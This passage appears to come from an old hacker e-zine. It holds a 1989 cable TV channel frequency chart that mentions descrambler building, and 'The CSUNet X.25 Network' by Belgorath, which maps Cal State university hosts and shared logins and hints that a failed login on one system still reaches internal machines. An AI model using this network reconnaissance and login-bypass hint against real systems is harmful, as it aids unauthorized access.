  742.                COURTESY  OF:   JOE  (WA1VIA)   &   JIM  (WA1FTA)
  743.  
  744. CATV CHANNEL        FREQUENCY (MHz)          CATV CHANNEL      FREQUENCY (MHz)
  745. -------------------------------------------------------------------------------
  746.  2      2            55.25                    37     AA         301.25
  747.  3      3            61.25                    38     BB         307.25
  748.  4      4            67.25                    39     CC         313.25
  749.  5      5            77.25                    40     DD         319.25
  750.  6      6            83.25  (85.25 ICC)       41     EE         325.25
  751. ---------------------------------------       42     FF         331.25
  752.  7      7           175.25                    43     GG         337.25
  753.  8      8           181.25                    44     HH         343.25
  754.  9      9           187.25                    45     II         349.25
  755. 10     10           193.25                    46     JJ         355.25
  756. 11     11           199.25                    47     KK         361.25
  757. 12     12           205.25                    48     LL         367.25
  758. 13     13           211.25                    49     MM         373.25
  759. ---------------------------------------       50     NN         379.25
  760. 14      A           121.25                    51     OO         385.25
  761. 15      B           127.25                    52     PP         391.25
  762. 16      C           133.25                    53     QQ         397.25
  763. 17      D           139.25                    54     RR         403.25
  764. 18      E           145.25                    55     SS         409.25
  765. 19      F           151.25                    56     TT         415.25
  766. 20      G           157.25                    57     UU         421.25
  767. 21      H           163.25                    58     VV         427.25
  768. 22      I           169.25                    59     WW         433.25
  769. ----------------------------------------      60     W+         439.25
  770. 23      J           217.25                    ---------------------------------
  771. 24      K           223.25                    61     W+1        445.25
  772. 25      L           229.25                    62     W+2        451.25
  773. 26      M           235.25                    63     W+3        457.25
  774. 27      N           241.25                    64     W+4        463.25
  775. 28      O           247.25                    65     W+5        469.25
  776. 29      P           253.25                    ---------------------------------
  777. 30      Q           259.25                    66     A-1        115.25
  778. 31      R           265.25                    67     A-2        109.25
  779. 32      S           271.25                    68     A-3        103.25
  780. 33      T           277.25                    69     A-4         97.25
  781. 34      U           283.25                    70     A-5         91.25
  782. 35      V           289.25                    ---------------------------------
  783. 36      W           295.25                    01     A-8         73.25
  784. -------------------------------------------------------------------------------
  785. * This chart was created 08/19/89 by:  WA1VIA & WA1FTA.   Some uses include the
  786. isolation of CATV interference to other radio services,  and building of active
  787. & passive filters,  and descramblers.  This does NOT give you the right to view
  788. or decode premium cable channels;  without proper authorization from your local
  789. cable TV company.  Federal and various state laws provide for substantial civil
  790. an criminal penalties for unauthorized use.
  791. -------------------------------------------------------------------------------
  792. ******************************************************************************
  793.  
  794.                           -----------------------------
  795.                              The CSUNet X.25 Network
  796.                               Overview by Belgorath
  797.                           -----------------------------
  798.                               C y b e r   C o r p s
  799.  
  800.      Calstate University, along with Humboldt State, runs a small X.25 network
  801. interconnecting its campuses. This file will attempt to give an overview of
  802. this network. The hosts on this network are connected via 9600-baud links. The
  803. main PAD on this network is a PCI/01 that allows the user to connect to several
  804. hosts. Among them are:
  805.  
  806. (At the time of this writing, several of the machines were unreachable. They
  807.  are marked with "No info available")
  808.  
  809. hum       - Humboldt State University CDC Cyber 180-830 (NOS 2.7.1)
  810. swrl      - A CalState CDC Cyber named "Swirl", running CDCNet. You may use
  811.             CDCNet to connect to the following hosts:
  812.             ATL    (SunOS, eis.calstate.edu), login as:
  813.                access to request an account
  814.                ctp    to access CTP
  815.             CCS    CDC Cyber 960-31 (NOS 2.7.1) - This is Swirl without CDCNet
  816.             COC    CDC Cyber 960-31 (NOS 2.7.1)
  817.             FILLY  VAX 6230 (VMS 5.3)
  818.             ICEP   IBM 4381 (VM)
  819.             OX     IBM 4381 (MVS) (Aptly Named)
  820. mlvl      - University of California's Library Catalog System, named
  821.             "Melvyl".
  822. sb        - Calstate/San Bernardino CDC Cyber 180-830 (NOS 2.5.2)
  823. sd        - San Diego State University CDC Cyber 180-830B (NOS 2.7.1)
  824. chi       - Calstate/Chico CDC Cyber 180-830 (NOS 2.7.1) - oddly enough
  825.             this system is running CDCNet with itself as the only host
  826. bak       - Calstate/Bakersfield CDC Cyber Dual 830 CMR-1 (NOS 2.7.1)
  827.             this system is running CDCNet, and if you fail the login, you
  828.             can connect to these systems, if you type fast enough:
  829.             CCS      - Central Cyber 960 System
  830.             CSBINA   - CSUB Instructional Vax 3900
  831.             CSBOAA   - CSUB Office Automation Vax 4300
  832.             CYBER    - Local host
  833.             RBFBATCH - CSUB CDC Cyber Remote Batch Gateway
  834. ccs       - CDC Cyber 960-31 (CCS from Swirl)
  835. coc       - CDC Cyber 960-31 (COC from Swirl)
  836. dh        - Calstate/Dominguez Hills CDC Cyber 960-11 (NOS 2.7.1) -
  837.             this system runs CDCNet with no hosts.. go figure
  838. fre       - Calstate/Fresno - No info available
  839. ful       - Calstate/Fullerton - No info available
  840. hay       - Calstate/Hayward - No info available
  841. la        - Calstate/Los Angeles - No info available
  842. lb        - Calstate/Long Beach - No info available
  843. mv        - No info available
  844. news      - No info available
  845. nor       - Calstate/Northridge - No info available
  846. pom       - California State Polytechnic University, Pomona - No info available
  847. sac       - Calstate/Sacramento CDC Cyber 180-830 (NOS 2.5.2)
  848. sf        - Calstate/San Francisco - No info available
  849. sj        - San Jose State University - No info available
  850. son       - Sonoma State University CDC Cyber 180-830 (NOS 2.7.1) - this
  851.             system runs CDCNet with itself as the only host
  852. sm        - No info available
  853. slo       - California State Polytechnic University, San Luis Obispo - No info
  854.             available
  855. sta       - Calstate/Stanislaus - No info available
  856. ven       - No info available
  857. carl      - No info available
  858.  
  859. caps      - CSUNet networking machine. From it, you can connecting to most
  860.             PAD hosts plus a few more. The extras are:
  861.             access    - Connect to eis.calstate.edu (login as "access")
  862.             core      - Connect to eis.calstate.edu (login as "core")
  863.             ctp       - Connect to eis.calstate.edu (login as "ctp")
  864.             eis       - Connect to eis.calstate.edu (login as "eis")
  865.             trie      - Connect to eis.calstate.edu (login as "trie")
  866.             csupernet - CSUPERNet appears to be a public-access UNIX.
  867.                         login as "public" for ATI-Net.
  868.                         login as "super" for academic information.
  869.                         login as "atls" for the ATLS system
  870.                         Once you apply for an account here, you can telnet
  871.                         to caticsuf.cati.csufresno.edu to use it.
  872.  
  873.      This is all well and good, but how to you access CSUNet? It can be reached
  874. via Internet, using the Humbolt PACX (pacx.humboldt.edu). The Humboldt PACX
  875. allows several services, among them are:
  876.  
  877.      X25 - Connect directly to CSUNet PAD
  878.      960 - CDC Cyber 180/830 (Swirl)
  879.      830 - CDC Cyber 180/830 (COC from Swirl)
  880.      VAX - VAX 8700 (VMS V5.3)
  881.      70  - DEC PDP 11/70 (running RSTS)
  882.      SEQ - Sequent S81 (running Dynix V3.1.4 X.25 UNIX software)
  883.   TELNET - Telnet Server
  884.  
  885.      That's really all there is to say concerning the network structure (well,
  886. I could go through and list all their X.25 addresses, but I won't). There's a
  887. ton more to be said about using this network, but its little quirks and
  888. surprises can be left to you to figure out. What I can do here is give a few
  889. hints on using CDCNet and the PAD.
  890.  
  891. Using the PAD
  892. ~~~~~~~~~~~~~
  893.      Once you're at the X.25 PAD, you'll get a message like:
  894. CSUnet Humboldt PCI/01, Port: P17
  895.      At the "Pad>" prompt, simply type the hostname to connect to. When in
  896. doubt, type "help <subjectname>", or just "help" for a list of subjects that
  897. help is available on.
  898.  
  899. Using CDCNet
  900. ~~~~~~~~~~~~
  901.      When a CDC Cyber says "You may now execute CDCNet Commands", this is your
  902. cue. You have the following commands available:
  903.  
  904. activate_auto_recognition
  905. activate_x_personal_computer
  906. change_connection_attribute
  907. change_terminal_attribute
  908. change_working_connection
  909. create_connection
  910. delete_connection
  911. display_command_information
  912. display_command_list
  913. display_connection
  914. display_connection_attribute
  915. display_service
  916. display_terminal_attribute
  917. do
  918. help
  919. request_network_operator
  920.  
  921.      The ones to concern yourself with are display_service, create_connection,
  922. and help. "help" gives the above command listing (useful), "display_service"
  923. lists the hosts on the current CDCNet, and "create_connection <host>" creates a
  924. connection to "host" on the CDCNet.
  925.  
  926. *******************************************************************************
  927.  
  928.  
  929.